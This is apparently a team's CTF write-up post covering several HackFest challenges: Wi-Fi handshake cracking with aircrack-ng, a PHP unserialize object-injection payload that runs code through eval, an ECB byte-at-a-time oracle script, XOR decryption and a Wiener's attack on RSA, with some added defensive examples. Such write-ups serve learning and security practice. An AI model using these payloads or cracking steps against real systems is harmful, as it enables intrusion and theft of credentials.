HackFest_CTF{Final_R0und_Writeups}



For10, Forensic, 10 pt {by BilelKor}

We were given a packet capture containing a Wi-Fi handshake. The first thing we want to do is open this file in Wireshark. Once the file is open, we can see that we do indeed have wireless frames from which we need to extract the password. All we need to do is crack the password using Aircrack and the rockyou wordlist.

aircrack-ng for10.cap -w rockyou-10.txt 
 
Here I am using different parts of the rockyou wordlist; you can download the full list from this link: http://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt


The flag is: hackfest{jennifer}

Rev10, Reverse, 10 pt {by S0ld1er}
You can easily get the flag using strings and grep

strings rev10.exe | grep "hack" 
 



The flag is: hackfest{f1ae14dfb0f46fc4ab1998fe98bc51c8}

web50, Web, 50 pt {by Chouaib}

Honestly, I forgot what the task said exactly, but the goal is to get the flag, so let's move on to the PHP source code to see how it works. Code:
<?php
function print_flag(){
    print file_get_contents('/var/www/flag.txt');

}
class Hackfest
{     private $hook;
    // __toString() runs whenever the object is used as a string
    function __toString()
    {   // evaluates whatever code is stored in the property
        if (isset($this->hook)) eval($this->hook);
    }
}
if(!empty($_GET['msg'])){
    // request input goes straight into unserialize()
    $user_date = unserialize($_GET['msg']);
}

?>
Hello!

Hmm, so as I see it there is a parameter 'msg' sent with the GET method and passed to the unserialize() function, so let's quickly view how it works on php.net.



As we can see, there is a warning that using this function can expose the application to PHP Object Injection. Ref: https://www.owasp.org/index.php/PHP_Object_Injection

Let's exploit it and get the flag, Rule:

O::"":1:{s::"";s:length_file:"file";}
So I generated my payload:

   O:8:"Hackfest":1:{s:14:"Hackfest hook";s:13:"print_flag();";} 
and then I encoded it with url_encode, which gave me the flag:

O%3A8%3A%22Hackfest%22%3A1%3A%7Bs%3A14%3A%22Hackfest%20hook%22%3Bs%3A13%3A%22print_flag()%3B%22%3B%7D%20
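
For the defending side, a small walker for the serialize() format makes it possible to see exactly which classes and properties a request value would instantiate before it ever reaches unserialize(). This is an added example, not part of the original write-up or the challenge; `find_objects` and `SAMPLE` are hypothetical names, and the sample is constructed from the payload shown above.

```python
def find_objects(data: bytes):
    """Return [(class_name, properties)] for every object in a PHP serialize() string."""
    found = []

    def number(pos):                      # read the digits up to the next ':'
        end = data.index(b":", pos)
        return int(data[pos:end]), end + 1

    def pairs(pos, count):                # body of an array or object: {key value ...}
        pos, out = pos + 1, {}
        for _ in range(count):
            key, pos = value(pos)
            out[key], pos = value(pos)
        if data[pos:pos + 1] != b"}":
            raise ValueError("expected '}' at offset %d" % pos)
        return out, pos + 1

    def value(pos):
        tag = data[pos:pos + 1]
        if tag == b"N":                   # N;
            return None, pos + 2
        if tag in (b"i", b"b", b"d"):     # i:1;  b:0;  d:0.5;
            end = data.index(b";", pos)
            return data[pos + 2:end].decode(), end + 1
        if tag == b"s":                   # s:<byte length>:"<bytes>";
            n, pos = number(pos + 2)
            if data[pos + 1 + n:pos + 3 + n] != b'";':
                raise ValueError("declared string length does not match")
            return data[pos + 1:pos + 1 + n], pos + 3 + n
        if tag == b"a":                   # a:<count>:{...}
            count, pos = number(pos + 2)
            return pairs(pos, count)
        if tag == b"O":                   # O:<len>:"<class>":<count>:{...}
            n, pos = number(pos + 2)
            name = data[pos + 1:pos + 1 + n].decode()
            count, pos = number(pos + 3 + n)
            props, pos = pairs(pos, count)
            found.append((name, props))
            return name, pos
        raise ValueError("unknown type tag %r at offset %d" % (tag, pos))

    value(0)
    return found

# Constructed sample: the payload above as PHP emits it. A private property is
# stored as "\0Class\0name", which is why its declared length is 14 and not 13.
SAMPLE = b'O:8:"Hackfest":1:{s:14:"\x00Hackfest\x00hook";s:13:"print_flag();";}'
```

A filter built on this would refuse any value for which `find_objects` returns a non-empty list or raises `ValueError`; on the PHP side the same effect comes from `unserialize($data, ['allowed_classes' => false])` or from using `json_decode()` for request input.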


Forensic Malware Analysis, 50 pt {by Chouaib}
This task is about analyzing the malware they gave us to get the IP and port it connects to. I had some problems with my virtual machine when trying to run it there, so I searched for online malware analysis tools.

At last I found a website for online malware analysis, which gave me a traffic capture file; with some simple analysis I noticed this weird connection
 "From IP:1028 to 193.95.68.245:81", so this is the flag: hackfest{193.95.68.245:81}

Crypto10, Cryptography, 10 pt {by Aymen Borgi}
At first sight, I thought about XOR encryption, which is why finding the key was my first goal. It was very easy to find.


EE was repeated many times in the signature of the file, which is why I thought that EE is our key, so we wrote this dirty code:

b = bytearray(open('crypto10.enc', 'rb').read())
l=0xEE
for i in range(len(b)):
    b[i] ^= l
open('b', 'wb').write(b)
and finally we got a picture containing the flag :D
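
Why the key shows up in plain sight: every 0x00 byte of the original file XORs to the key itself, and image headers are full of zero bytes. The added example below (not the author's script; the sample is a constructed PNG-like header, not the challenge file, and all function names are hypothetical) picks the most frequent byte as the key candidate and confirms it against known file signatures, falling back to all 256 keys if the guess is wrong.

```python
from collections import Counter

# File signatures of a few common image formats (well-known constants).
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg", b"GIF8": "gif"}

def xor(data: bytes, key: int) -> bytes:
    """Single-byte XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key for b in data)

def guess_key(ciphertext: bytes) -> int:
    """Most frequent ciphertext byte: runs of 0x00 in the plaintext encrypt to the key."""
    return Counter(ciphertext).most_common(1)[0][0]

def recover(ciphertext: bytes):
    """Return (key, file_type, plaintext), or (None, None, None) if no signature matches."""
    for key in [guess_key(ciphertext)] + list(range(256)):
        head = xor(ciphertext[:8], key)
        for magic, kind in MAGIC.items():
            if head.startswith(magic):
                return key, kind, xor(ciphertext, key)
    return None, None, None

# Constructed sample: PNG signature, start of an IHDR chunk, zero padding.
PLAIN = (b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR"
         + b"\x00\x00\x01\x00\x00\x00\x01\x00\x08\x02" + bytes(16))
SAMPLE = xor(PLAIN, 0xEE)

if __name__ == "__main__":
    key, kind, _ = recover(SAMPLE)
    print("key=0x%02X type=%s" % (key, kind))
```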

Rev50, Reverse, 50 pt {by Aymen Borgi}
The idea was very simple: using jd-gui to decompile the file, then looking at the Java code, we saw that the program uses XOR encryption to encrypt the elements of 2 tables. So we wrote this Python script to get the flag:

a = [114, 121, 126, 116, 115, 114, 109, 110, 98, 41, 122, 43, 125, 25, 41, 126, 46, 45, 123, 45, 39, 41, 45, 35, 66, 45, 47, 38, 43, 122, 47, 120, 35, 122, 33, 70, 126, 33, 47, 34, 112, 100]
b = [26, 24, 29, 31, 21, 23, 30, 26, 25, 31, 30, 30, 28, 32, 30, 31, 29, 21, 30, 31, 21, 30, 20, 21, 32, 29, 24, 23, 24, 31, 22, 25, 26, 28, 21, 32, 24, 21, 30, 20, 21, 25]
l=[]
for i in range(len(a)):
    l.append(chr(a[i] ^ b[i]))

print(''.join(l))

 

and finally we got the flag: hackfest{6d5a97a38e22796b0713e9a9f4ff416e}
Your only weapon for solving this challenge is understanding Java, that's all ;)

Crypto75, Cryptography, 75 pt {by Bilel Korbosli}
We have already solved this challenge before; we edited the source code and changed it a little bit.
Check out our previous write-up about this challenge: http://0xbugsbunny.blogspot.com/2016/08/icectfStage3l33tcrypt.html
Code:

import socket
import base64

def netcat(hostname, port, content):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, port))
    data = s.recv(1024)
    s.sendall(content)
    s.shutdown(socket.SHUT_WR)
    data = s.recv(220)
    s.close()
    return data
    
sd="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# hex alphabet used for the guesses
a=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
flag = ""  # characters recovered so far
for j in range(112):
 sd=sd[:len(sd)-1]
 dt = base64.b64encode(sd)
 # response for the shortened padding alone
 f1 = netcat("challenge.hackfest.tn",3001,dt+"\n")
 f1 =f1[:-2]
 f1 = base64.b64decode(f1).encode('hex')[:224]
 print '::'+f1
 for k in a:
  # same padding plus the known flag prefix and one guessed character
  dt = base64.b64encode(sd+flag+k)
  f2 = netcat("challenge.hackfest.tn",3001,dt+"\n")
  f2 = f2[:-2]
  print k
  f2 = base64.b64decode(f2).encode('hex')[:224]
  if f2 == f1 :
   flag += k
   break
 print "flag : "+flag+"\n"
 #flag ="25583d232ef6b1cafbc32f0a947a60ba"
 
Crypto50, Cryptography, 50 pt {by Bilel Korbosli}

We were given e, c and n; it's obviously RSA with Wiener's attack.

#!/usr/bin/python  
import ContinuedFractions, Arithmetic  
import time  
import sys  
import base64  
import binascii  
import gmpy  
import sympy  
import math  
import fractions  
import struct  
sys.setrecursionlimit(100000)  
# modulus from the RSA public key  
n=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
# exponent from the RSA public key  
e=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
c=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
def hack_RSA(e,n):  
  print "Performing Wiener's attack. Don't Laugh..."  
  time.sleep(1)  
  frac = ContinuedFractions.rational_to_contfrac(e, n)  
  convergents = ContinuedFractions.convergents_from_contfrac(frac)  
  for (k,d) in convergents:  
    #check if d is actually the key  
    if k!=0 and (e*d-1)%k == 0:  
      phi = (e*d-1)//k  
      s = n - phi + 1  
      # check if the equation x^2 - s*x + n = 0  
      # has integer roots  
      discr = s*s - 4*n  
      if(discr>=0):  
        t = Arithmetic.is_perfect_square(discr)  
        if t!=-1 and (s+t)%2==0:  
          return d  
hacked_d = hack_RSA(e, n)  
print "d=" + str(hacked_d)  
m = pow(c, hacked_d, n)  
print "So the flag is:"  
print("%0512x" %m).decode("hex")  
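
The script above relies on two helper modules that are not shown. As an added example (not the author's code), here is the same check in self-contained Python 3, usable as an audit of a public key: Wiener's attack succeeds when d < n^(1/4)/3, because k/d then appears among the continued-fraction convergents of e/n. The key is a constructed textbook-sized one, not the challenge's, and the function names are hypothetical.

```python
from math import isqrt

def convergents(num, den):
    """Yield the convergents (k, d) of the continued fraction of num/den."""
    h0, h1, k0, k1 = 0, 1, 1, 0
    while den:
        a = num // den
        num, den = den, num - a * den
        h0, h1 = h1, a * h1 + h0
        k0, k1 = k1, a * k1 + k0
        yield h1, k1

def wiener(e, n):
    """Return (d, p, q) if the key falls to Wiener's attack, else None."""
    for k, d in convergents(e, n):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k      # candidate for (p-1)(q-1)
        s = n - phi + 1             # if phi is right, s = p + q
        disc = s * s - 4 * n        # and p, q are the roots of x^2 - s*x + n
        if disc < 0:
            continue
        t = isqrt(disc)
        if t * t == disc and (s + t) % 2 == 0:
            p, q = (s + t) // 2, (s - t) // 2
            if p * q == n:          # confirm the factorisation before reporting
                return d, p, q
    return None

# Constructed key: p=379, q=239, private exponent d=5 (far too small).
N, E = 90581, 17993

if __name__ == "__main__":
    print(wiener(E, N))             # the weak key is fully recovered
    print(wiener(5, N))             # same modulus with e=5 (d=17993): not affected
```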
 


Welcome, Misc, -50 pt
Just DO_NOT_SUBMIT_THE_FLAG !!!!!!!! (thanks to our hero we got -50 pt -_- )

pwn50, pwn, 50 pt {by Bilel Korbosli}
The task takes the first 8 numbers of the rand and saves the number in the 10th place of the stack.



We solved it locally for the write-up; we are sorry, we forgot to save the flag in the live session.

1 comment:

  1. I am asking for the hero name <3 looool, Keep it up , one of the best team ever met